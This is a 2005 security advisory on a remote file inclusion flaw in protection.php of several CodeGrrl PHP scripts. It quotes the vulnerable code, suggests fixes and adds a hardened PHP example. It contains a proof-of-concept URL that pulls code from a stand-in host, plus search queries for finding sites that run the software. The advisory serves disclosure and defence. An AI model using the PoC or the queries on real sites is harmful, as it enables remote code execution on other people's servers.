protection.php: action=logout / siteurl remote file inclusion

Software: PHPCalendar, PHPClique, PHPFanbase, PHPCurrently, PHPQuotes
Severity: Arbitrary code execution
Risk: High
Author: Robin Verton
Date: Sep. 24 2005
Vendor: codegrrl.com [contacted]
Description:
Written in PHP/MySQL, PHPCalendar is a script designed mainly to help webmasters maintain a calendar with all upcoming events and birthdays. It was designed for personal sites, but it can also be extremely useful for fansites, to keep track of tours, premieres, award shows, TV appearances, interviews, magazine features, and much more! You can see it in use at unfloopy.net. [http://www.codegrrl.com/]
Details:
1) protection.php (with register_globals = On)
If register_globals is on, an attacker can include an arbitrary PHP file and thereby execute malicious code, because the include path is taken from a request variable:

$logout_page = "$siteurl";   // $siteurl is populated straight from the request when register_globals is on
[...]
if ($action == "logout") {
    setcookie("logincookie[pwd]", "", time() - 86400);
    setcookie("logincookie[user]", "", time() - 86400);
    @include($logout_page);  // includes whatever the client supplied as siteurl
    exit;
}
Proof of Concept:
To exploit this flaw an attacker only has to send the following HTTP request:
http://www.example.com/protection.php?action=logout&siteurl=http://yourhost.com/malicious-code.txt
Solution:
Set register_globals to off in php.ini, or prohibit direct access to protection.php, e.g. by defining a constant in the application's entry point and checking it with code like

if( !defined('in_sys') ) { die('hacking attempt'); }

to block direct access.

Credits:
Credit goes to Robin Verton, 15 years old, from Germany
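As an added illustration (not the vendor's code and not part of the original advisory), the following PHP puts the vulnerable logout handler from protection.php beside a hardened version. The hardened version refuses to run unless the including application has defined in_sys, reads request input explicitly from $_GET instead of relying on register_globals, and chooses the page to include from a fixed allowlist of local files rather than from a request variable, so a siteurl parameter can no longer steer include(). The function names, the logout.php file name and the constant name are assumptions for this example.

```php
<?php
// Added example, not the vendor's code. Contrasts the exploitable pattern
// from protection.php with one way to harden it.

// ---- Vulnerable pattern (as in the advisory) -----------------------------
// With register_globals = On, $action and $siteurl are filled directly from
// the query string, so include() fetches whatever URL the client names.
function vulnerable_logout($action, $siteurl)
{
    $logout_page = "$siteurl";
    if ($action == "logout") {
        setcookie("logincookie[pwd]", "", time() - 86400);
        setcookie("logincookie[user]", "", time() - 86400);
        @include($logout_page);   // arbitrary / remote file inclusion
        exit;
    }
}

// ---- Hardened pattern ----------------------------------------------------
// 1. Refuse direct access. Only the application's entry point is expected to
//    run define('in_sys', true) before including this file.
if (!defined('in_sys')) {
    die('hacking attempt');
}

// 2. Never derive an include path from request data: the only accepted action
//    maps to one fixed local file (file name is an assumption for the example).
function logout_page_path()
{
    return __DIR__ . '/logout.php';
}

// 3. Read input explicitly from $_GET; do not depend on register_globals.
function hardened_logout(array $get)
{
    $action = isset($get['action']) ? $get['action'] : '';
    if ($action !== 'logout') {
        return;   // nothing to do for any other action value
    }

    setcookie("logincookie[pwd]", "", time() - 86400);
    setcookie("logincookie[user]", "", time() - 86400);

    // A "siteurl" parameter may still arrive with the request, but it is
    // ignored entirely; the page comes from the allowlist only.
    $target = logout_page_path();
    if (!is_file($target)) {
        die('logout page missing');
    }
    require $target;
    exit;
}

hardened_logout($_GET);
```

Run through the application's entry point (which defines in_sys), a request with action=logout&siteurl=http://attacker.example/x.txt now clears the cookies and includes the local logout.php only; requesting the file directly terminates at the in_sys check. Turning register_globals off in php.ini remains the first step, since it removes the variable injection that makes the original handler exploitable in the first place.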
References:
[1] http://codegrrl.com
[2] http://www.google.com/search?q=%22powered+by%3a+phpfanbase%22 [about 112,000 results]
[3] http://www.google.com/search?q=%22powered+by%3a+phpcalendar%22 [about 44,000 results]
[4] http://www.google.com/search?q=%22powered+by%3a+phpcurrently%22 [about 44,000 results]
[5] http://www.google.com/search?q=%22powered+by%3a+phpclique%22